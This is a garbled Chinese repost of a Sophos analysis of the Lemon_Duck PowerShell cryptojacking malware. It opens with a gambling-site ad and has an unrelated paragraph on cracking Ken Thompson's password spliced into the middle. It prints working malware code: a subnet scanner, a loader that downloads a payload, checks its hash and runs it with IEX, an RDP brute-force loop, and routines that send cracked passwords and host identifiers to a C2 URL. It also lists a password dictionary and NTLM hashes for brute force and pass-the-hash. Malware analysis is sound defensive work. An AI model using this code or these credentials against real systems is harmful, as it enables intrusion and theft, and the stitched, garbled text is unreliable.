申博开户,期待2019年,创新、务实、奋进。
,
近段时候,SophosLabs注意到一系列Lemon_Duck加密挟制进击事宜的发作,不仅在企业网络中敏捷流传,另有蔓延至环球局限的趋向。进击者运用了一系列先进技术,包含无文件剧本实行、滥用开源东西、破绽应用举行横向流传等,终究目的是将企业的大批CPU资本用于加密钱银发掘。
因其部份剧本运用“ $ Lemon_Duck”作为变量,因而这场行动也被称为Lemon_Duck PowerShell行动。
目的挑选
目的IP地点随机天生,在特定端口号上举行扫描监听,如445/TCP (SMB)、1433/TCP (MS-SQL 效劳器)或65529/TCP。
歹意剧本从长途盘算机取得响应后,它将探测EternalBlue SMB破绽机械的IP地点,或对MS-SQL效劳实行暴力进击,而在65529/TCP上开放监听端口的机械在之前已被进击者损坏过。
这部份歹意剧本随机天生目的IP地点的逻辑以下:
function getipaddrs{
write-host "Get ipaddress..."
$allip = @()
[string[]]$ipsub = @('192.168.0','192.168.1','192.168.2','192.168.3','192.168.4','192.168.5','192.168.6','192.168.7','192.168.8','192.168.9','192.168.10','192.168.18','192.168.31','192.168.199','192.168.254','192.168.67','10.0.0','10.0.1','10.0.2','10.1.1','10.90.90','10.1.10','10.10.1')
$regex = [regex]"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b" $regex.Matches((ipconfig /all)) | ForEach-Object {{{}}
if ($allip -notcontains $_.Value)
{ $allip {{+= $_.Value }}}
}
$regex.Matches((ipconfig /displaydns)) | ForEach-Object {{{}}
if ($allip -notcontains $_.Value)
{ $allip {{+= $_.Value }}}
}
$regex.Matches((netstat -ano)) | ForEach-Object {{{}}
if ($allip -notcontains $_.Value)
{ $allip {{+= $_.Value }}}
} foreach($IP in $allip)
{{{}}
if ($IP.StartsWith("127.") -or ($IP -match '25\d.') -or ($IP -match '24\d.') -or $IP.StartsWith("0.") -or $IP.StartsWith("169.254") -or $IP -eq '1.0.0.127')
{{{}}
}else{
$iptemp = $ip.Split(".")
$SubnetIP = $iptemp[0] "." $iptemp[1] "." $iptemp[2]
if ($ipsub -notcontains $SubnetIP)
{ $ipsub = @($SubnetIP) + $ipsub}
}
}
try{
$NetObject = New-Object Net.WebClient
$wlanip = $NetObject.DownloadString("https://api.ipify.org/")
$wlaniptemp = $wlanip.Split(".")
$wlansub = $wlaniptemp[0] "." $wlaniptemp[1] "." $wlaniptemp[2]
if($ipsub -notcontains $wlansub)
{ $ipsub += $wlansub }
}catch
try{
$ipaddress = [System.Net.DNS]::GetHostByName($null).AddressList
$localip = @()
Foreach ($ip in $ipaddress)
{{{}}
$localip += $ip.IPAddressToString
$intiptemp = $ip.IPAddressToString.Split(".")
if($intiptemp[0] -ne '127'){
$intipsub = $intiptemp[0] "." $intiptemp[1] "." $intiptemp[2]
if($ipsub -notcontains $intipsub)
{ $ipsub += $intipsub }
}
}
}catch
for($i=0; $i -lt 30; $i++){
try{
$ran_ipsub = ""(1(Get-Random -Maximum 254))"."(1+(Get-Random -Maximum 254))"."(1+(Get-Random -Maximum 254))
if($ipsub -notcontains $ran_ipsub){
$ipsub = ""(1+(Get-Random -Maximum 254))"."(1+(Get-Random -Maximum 254))"."(1+(Get-Random -Maximum 254))
}
}catch
}
$global:ipaddrs = @()
foreach($ipsub2 in $ipsub)
{{ { }
}
write-host $ipsub2
$global:ipaddrs = 1..254|%{$ipsub2{}"."+$_}
}
$global:ipaddrs = @($global:ipaddrs | Where-Object { $localip -notcontains $_ })
write-host "Get address done!!"
}
下面的一部份内容则指导了扫描特定监听端口的历程:
function localscan {
Param(
[int]$Port = 445
)
write-host "scan port $port..."
[string[]]$openips = @()
$clients = @
$connects = @
foreach($ip in $ipaddrs) {
try{
$client = New-Object System.Net.Sockets.TcpClient
$connect = $client.BeginConnect($ip,$port,$null,$null)
$connects[}}{{$ip}}{{] = $connect
$clients[}}{{$ip}}{{] = $client
}catch
}
Start-Sleep -Milli 3000
foreach($ip in $clients.Keys) {
if ($clients[}}{{$ip}}{{].Connected) {
$clients[}}{{$ip}}{{].EndConnect($connects[}}{{$ip}}{{])
$openips += $ip
}
$clients[}}{{$ip}}{{].Close()
}
write-host $openips.count
return ,$openips
}
末了,进击者试图经由过程暗码和哈希字典来暴力破解Microsoft SQL Server的“ sa”(超等管理员)帐户凭证。剧本内包含了一长串暗码,包含过去用于流传Mirai或其他IoT僵尸网络歹意软件的种种要挟构造运用过的暗码。进击者还运用一系列NTLM哈希值来举行“pass the hash” 进击。
暗码列表以下:
"saadmin","123456","password","PASSWORD","123.com","[email protected]","Aa123456","qwer12345","[email protected]","[email protected]","golden","[email protected]#qwe","[email protected]","Ab123","1qaz!QAZ","Admin123","Administrator","Abc123","[email protected]", "999999","Passw0rd","[email protected]#","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678", "123456789","987654321","admin","abc123","abcd1234","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","[email protected]","iloveyou","monkey","login","passw0rd","master","hello", "qazwsx","password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator","qwe1234A","qwe1234a","123123123","1234567890","88888888","111111111", "112233","a123456","123456a","5201314","1q2w3e4r","qwe123","a123456789","123456789a","dragon","sunshine","princess","[email protected]#$%^&*","charlie","aa123456","homelesspa","1q2w3e4r5t","sa","sasa","sa123","sql2005","sa2008", "abc","abcdefg","sapassword","Aa12345678","ABCabc123","sqlpassword","sql2008","11223344","admin888","qwe1234","A123456"
剧本的NTLM哈希集以下:
"31d6cfe0d16ae931b73c59d7e0c089c0","32ed87bdb5fdc5e9cba88547376818d4","8846f7eaee8fb117ad06bdd830b7586c","7b592e4f8178b4c75788531b2e747687","afffeba176210fad4628f0524bfe1942", "579da618cfbfa85247acf1f800a280a4", "47bf8039a8506cd67c524a03ff84ba4e","5ae7b89b3afea28d448ed31b5c704289","3f9f5f112da330ac4c20be279c6addfa","73f5d97549f033374fa6d9f9ce247ffd", "6f12c0ab327e099821bd938f39faab0d","e5ae562ddfaa6b446c32764ab1ebf3ed", "161cff084477fe596a5db81874498a24","d30c2ef8389ac9e8516baacb29463b7b","bc007082d32777855e253fd4defe70ee", "e45a314c664d40a227f9540121d1a29d","d144986c6122b1b1654ba39932465528","f4bb18c1165a89248f9e853b269a8995", "570a9a65db8fba761c1008a51d4c95ab","e1a692bd23bde99b327756e59308b4f8", "a87f3a337d73085c45f9416be5787d86","00affd88fa323b00d4560bf9fef0ec2f","31fc0dc8f7dfad0e8bd7ccc3842f2ce9","674e48b68c5cd0efd8f7e5faa87b3d1e", "69943c5e63b4d2c104dbbcc15138b72b", "588feb889288fb953b5f094d47d1565c","bcdf115fd9ba99336c31e176ee34b304","3dbde697d71690a769204beb12283678","df54de3f3438343202c1dd523d0265be","7ce21f17c0aee7fb9ceba532d0546ad6", "7a21990fcd3d759941e45c490f143d5f","579110c49145015c47ecd267657d3174","af27efb60c7b238910efe2a7e0676a39","2d7f1a5a61d3a96fb5159b5eef17adc6","4057b60b514c5402dde3d29a1845c366", "e8cd0e4a9e89eab931dc5338fcbec54a", "6920c58d0df184d829189c44fafb7ece","3fa45a060bd2693ae4c05b601d05ca0c","ba07ba35933e5bf42dea4af8add09d1e","f1351ac828428d74f6da2968089fc91f", "e84d037613721532e6b6d84d215854b6","2f2d544c53b3031f24d63402ea7fb4f9", "328727b81ca05805a68ef26acb252039","259745cb123a52aa2e693aaacca2db52","c22b315c040ae6e0efee3518d830362b", "162e829be112225fedf856e38e1c65fe","209c6174da490caeb422f3fa5a7ae634","f9e37e83b83c47a93c2f09f66408631b", "b3ec3e03e2a202cbd54fd104b8504fef","4ed91524cb54eaacc17a185646fb7491", "aa647b916a1fad374df9c30711d58a7a","a80c9cc3f8439ada25af064a874efe2d","13b29964cc2480b4ef454c59562e675c","de26cce0356891a4a020e7c4957afc72", "e19ccf75ee54e06b06a5907af13cef42", "30fcaa8ad9a496b3e17f7fbfacc72993","41630abb825ca50da31ce1fac1e9f54d","f56a8399599f1be040128b1dd9623c29","2e4dbf83aa056289935daea328977b20","b963c57010f218edc2cc3c229b5e4d0f", "f2477a144dff4f216ab81f2ac3e3207d","e6bd4cdb1e447131b60418f31d0b81d6","b9f917853e3dbf6e6831ecce60725930","6d3986e540a63647454a50e26477ef94","066ddfd4ef0e9cd7c256fe77191ef43c", "152efbcfafeb22eabda8fc5e68697a41", "5835048ce94ad0564e29a924a03510ef","2d20d252a479f485cdf5e171d93985bf","320a78179516c385e35a93ffa0b1c4ac","0d757ad173d2fc249ce19364fd64c8ec", "72f5cfa80f07819ccbcfb72feb9eb9b7","f67f5e3f66efd7298be6acd32eeeb27c", "1c4ecc8938fb93812779077127e97662","ad70819c5bc807280974d80f45982011","a836ef24f0a529688be2af1479a95411", "36aa83bdcab3c9fdaf321ca42a31c3fc","acb98fd0478427cd18949050c5e87b47","85deeec2d12f917783b689ae94990716", "a4141712f19e9dd5adf16919bb38a95c","e7380ae8ef85ae55bdceaa59e418bd06", "81e5f1adc94dd08b1a072f9c1ae3dd3f","71c5391067de41fad6f3063162e5eeff"
假如你运转的是面向大众internet的MS-SQL效劳器,而且运用的暗码在上述列表中,纵然如今还未遭到进击,进击的到来也是早晚的事。
Lemon_Duck杀死链
歹意剧本运用Windows调理使命机制,每隔一小时下载并实行一个新的歹意副本。最初下载的剧本在实行之前运用硬编码的散列对本身举行考证,假如胜利再将下载其他payload——矿机和开辟模块。
剧本中,考证校验和内容以下:
$tm1='$Lemon_Duck=''_T'';
$y=''_U'';$z=$y{}''p''{}'''$v''';
$m=(New-Object System.Net.WebClient).DownloadData($y); // Downloaded SHA should be equal to 'd8109cec0a51719be6f411f67b3b7ec1'
[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach}{{$s+=$_.ToString(''x2'')};
if($s-eq''d8109cec0a51719be6f411f67b3b7ec1''){
IEX(-join[char[]]$m)
}
变量$ Lemon_Duc存储使命的文件名,并经由过程User-Agent字符串将其通报给敕令和掌握效劳器。此阶段搜检终了后剧本将最先下载payload。
流传和横向挪动
剧本还运用初始感染机械作为立足点,在网络中横向流传。它采用了多种要领,包含:
· EternalBlue:SMB效劳破绽应用
· USB和网络驱动器:剧本将歹意Windows * .lnk快捷方式文件和DLL文件写入连接到受感染机械的可挪动存储或映照的网络驱动器(CVE-2017-8464)中
· 启动文件夹:剧本将文件写入Windows文件体系上的启动位置(比方“最先”菜单的“启动”文件夹),在重启后实行。
· MS-SQL Server暴力破解 – 运用上述暗码列表对比SQL Server的“ SA”帐户。
· Pass the Hash进击 – 应用上表中的NTLM哈希
· 运用WMI在长途盘算机上实行歹意敕令
· RDP暴力破解
剧本还会建立一个或多个计划使命,在初始进击几分钟后启动歹意剧本。这个技能能够是为了回避平安东西基于行动的检测,但要领显得低级且愚笨,这类平安东西能经由过程跟踪事宜的递次和时候来辨认正在举行的进击,而且从理论上说,一旦在短时候内可疑敕令次数凌驾某个阈值,进击就会被阻挠。
从C&C效劳器下载新剧本后,新剧本将删除初始建立的“计划使命”条目。以下是进击者流传要领的一些示例:
EternalBlue:
进击者用PingCastle的东西扫描445 / TCP,看是不是轻易遭到EternalBlue破绽的进击。
PingCastle EternalBlue破绽扫描顺序
接着对易受损的机械举行EternalBlue进击,剧本会肯定目的机械所用的Windows 版本。
try{
write-host "start eb scanning..."
$vul=[PingCastle.Scanners.m17sc]::Scan($currip) // scan for vulnerable IP
if($vul{{) { }
}
write-host "$currip seems eb vulnerable..."
$res = eb7 $currip $sc //targeting win7 & older version
if($res) {
write-host "$currip eb7 got it!!!"
} else {
$res = eb8 $currip $sc //Windows 8, 10 & 2012
if($res) {
write-host "$currip eb8 got it!!!"
}
}
}
}catch
肯定版本后,剧本将启动以下所示的“ SMB Exploitation Module”。
Lemon_Duck的EtrernalBlue进击代码
LNK长途代码实行:
在近来的一次更新中,进击者引入了Windows快捷方式* .lnk应用组件。该组件应用CVE-2017-8464破绽,将歹意DLL组件及响应* .lnk文件复制到USB挪动存储装备或网络驱动器中举行流传。
UNIX 团结创始人BSD暗码被破解
UNIX联合创始人Ken Thompson 39年前使用的基于BSD的系统login密码最终被破解,BSD是UNIX的原始版本,有许多计算机科学领域的先锋都使用该系统。 2014年,开发者Leah Neukirchen在 BSD v3的/etc/passwd文件中找到了20多个Unix先驱的哈希密码。 因为所有的密码都是用基于DES的 crypt(3) 算法保护的,且最多8个字符。Neukirchen决定暴力破解并用密码破解工具成功破解了几乎所有人的密码。 他没有成功破解的有 Ken Thompson和其他5个构建Unix系统的开发贡献人员,其中就包括Bill Joy,Bill Joy在1986年还合伙创建了Sun Microsystems,并设计了Java编程语言。 Leah Neukirchen意识到与其他的密码哈希方案(如N
USBLNK组件能够流传到FAT32、NTFS文件同享或挪动存储装备中
剧本还会建立一个名为 “UTFsync inf_data” – (file_location) 的文件作为参考标记,以确认驱动器已被* .lnk和* .dll组件感染,以防止再次感染。
PassTheHash进击:
剧本会考证用户的帐户特权。假如用户具有管理员权限,则剧本将挪用PowerDump模块和Mimikatz来转储一切NTLM哈希、用户名、暗码和域信息,随后运用这些凭证上传歹意剧本文件,然后将相干的批处理或*.lnk文件上传到可接见的长途机械的%startup%文件夹中,或运用WMI长途实行PowerShell代码。
PowerDump模块:
该模块与此用于渗入测试的开放源码剧本异常类似,并供应两个分外的开放源码剧本东西。
歹意软件运用Mimikatz网络凭证,并挪用以下PowerShell模块:
“ Invoke-SE” –在长途盘算机上实行歹意批处理敕令。
“Invoke-SMBC”–“List”由SMB保护的一切用户的IPC $份额。它实行三种差别的操纵 “List”, “Put”和“Delete”。
歹意剧本挪用了几个开源渗入测试东西PowerShell剧本
MS-SQL效劳器暴力破解:
剧本端口扫描运动的IP地点,并罗列具有开放端口1433 / TCP(Microsoft SQL效劳运用的端口)的一切盘算机,然后运用暗码列表对“ SA”用户帐户举行暴力进击,包含上面显现的暗码以及运用Mimikatz从本机当地网络的暗码。
在胜利破解MS-SQL效劳器帐户以后,剧本运用sqlserver.exe历程对其他机械实行歹意敕令。
RDP暴力破解:
RDP模块扫描在默许RDP端口3389 / TCP上监听的开放效劳器,并尝试运用用户名“administrator”登录。剧本将运用“ freerdp”开源实用顺序在硬暗码列表中轮回。胜利登录后,将在盘算机中实行歹意敕令。
foreach($currip in $rdp_portopen[1]) {
$currip
if (($old_portopen -notcontains $currip) -and ($currip.length -gt 6)){
write-host "start rdp scanning..."
foreach($password in $allpass){
write-host "Try pass:$password"
$flag = (new-object RDP.BRUTE).check($exepath,$currip,"administrator",$password,$false)
if($flag){
write-host "SUCC!!"
$brute = new-object RDP.BRUTE
if($brute.check($exepath,$currip,"administrator",$password,$true)){
(New-Object Net.WebClient).DownloadString($log_url+'/report.json?type=rdp&ip='+$currip+'&pass='+$password+'&t='+$t)
[RDP.CMD]::runCmd($rdp_code)
write-host "Try to run command!!"
}
start-sleep 10
$brute.exit()
break;
}
}
}
}
RDP 暴力破解启动代码
假如盘算机被上述任何一种要领损坏,剧本将修正Windows防火墙设置,翻开端口65529/TCP。这个将作为标记歹意剧本的标识,辨认已被损坏的盘算机。
此应用代码一连运转,每次天生一个新的随机IP地点列表时停息5分钟。剧本将扫描SMB和MS-SQL效劳,还会在每次运转代码时构建盘算机的相干机能信息,并通报到敕令掌握效劳器。
跟踪状况发送回C2:
该模块仅在盘算机初次遭到入侵时运转,一般发作在杀死链的尾端,在实行一切下载模块当地开辟、横向挪动和发掘剧本以后。此模块将机械配置文件连同每一个实行模块的状况报告回其C2效劳器。
write-host "reporting"
try{
$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
$comp_name = $env:COMPUTERNAME
$wf = test-path $env:tmp\wfreerdp.exe // RDP utility
$mf = test-path $env:tmp\mimi.dat // mimikatz
(New-Object Net.WebClient).DownloadString($log_url+'/log.json?V=0.1&ID='+$comp_name+'&GUID='+$guid+'&MAC='+$mac+'&retry='+$retry+'&pc1='+$portopen[1].count+'&pc2='+$ms_portopen[1].count+'&pc3='+$old_portopen[1].count+'&pc4='+$rdp_portopen[1].count+'&pci='+$ipaddrs_i.count+'&pco='+$ipaddrs_o.count+'&pcb='+$global:ipaddrs_b+'&mi='+($getpasswd -join "^^")+'&wf='+[Int]$wf+'&mf='+[Int]$mf)
}catch{}
C2延续监控:
受感染机械将不停向C2效劳器发送报告,报告最新的开辟和发掘模块的状况。此模块在一切有payload剧本模块运转后实行。在发送回C2效劳器的参数中,有关于受损用户帐户、机械配置、用户特权和开辟或发掘有用负载状况的详细信息。
hxxp://<redacted.com>/report.jsp?ID=HAWKINS-PC&GUID=2D3EC845-35CD-1346-876E-96257ADE6A2F&MAC=&OS=6.1.7601&BIT=32&USER=HAWKINS-PC$&DOMAIN=WORKGROUP&D=&CD=Standard%20VGA%20Graphics%20Adapter&P=1&FI=0&FM=0&IF=0&MF=0&HR=&UP=664.468&_T=1569808438.79244 Paramaters - $comp_name = Computername $guid = machine UUID $mac = mac address of the machine $os = installed OS version $bit = 32 or 64 bit architecture $user = username $domain = User Domain $uptime = system uptime $card = Installed Graphic Card Name $if_ = Exploit & threat progration module $mf_ = active 32 or 64 bit mining module $drive = removable & network drive information $timestamp = Date in UFormat $isA = If AMD Radeon graphic Card Installed & 64 bit machine $permit - Is administrator FI & IF - Confirm the threat propgation module is executed and running active FM & MF - Confirm mining module executed and running active &HR - Miner Hashrate information
要挟趋向
SophosLabs已监控了此歹意软件的网络通信,并建立了一个受损盘算机的数据库。依据遥测体系中受损的机械数目,我们推想这些进击能够起源于亚洲,但当前已散布到每一个大洲。
世界各地受感染的机械,经由过程它们的IP地点举行地舆定位
检测局限
Sophos将运用以下一些元素定义检测Lemon_Duck PowerShell组件
· HPmal/PowDld-B -中心矿机组件
· Mal/PshlJob-A -过去行动中的使命文件+ Mssql暴力破解使命文件
· Mal/MineJob-C由Eternal Blue Exploitation建立的使命文件
· Mal/MineJob-B使命文件持久性
本文翻译自:https://news.sophos.com/en-us/2019/10/01/lemon_duck-powershell-malware-cryptojacks-enterprise-networks/
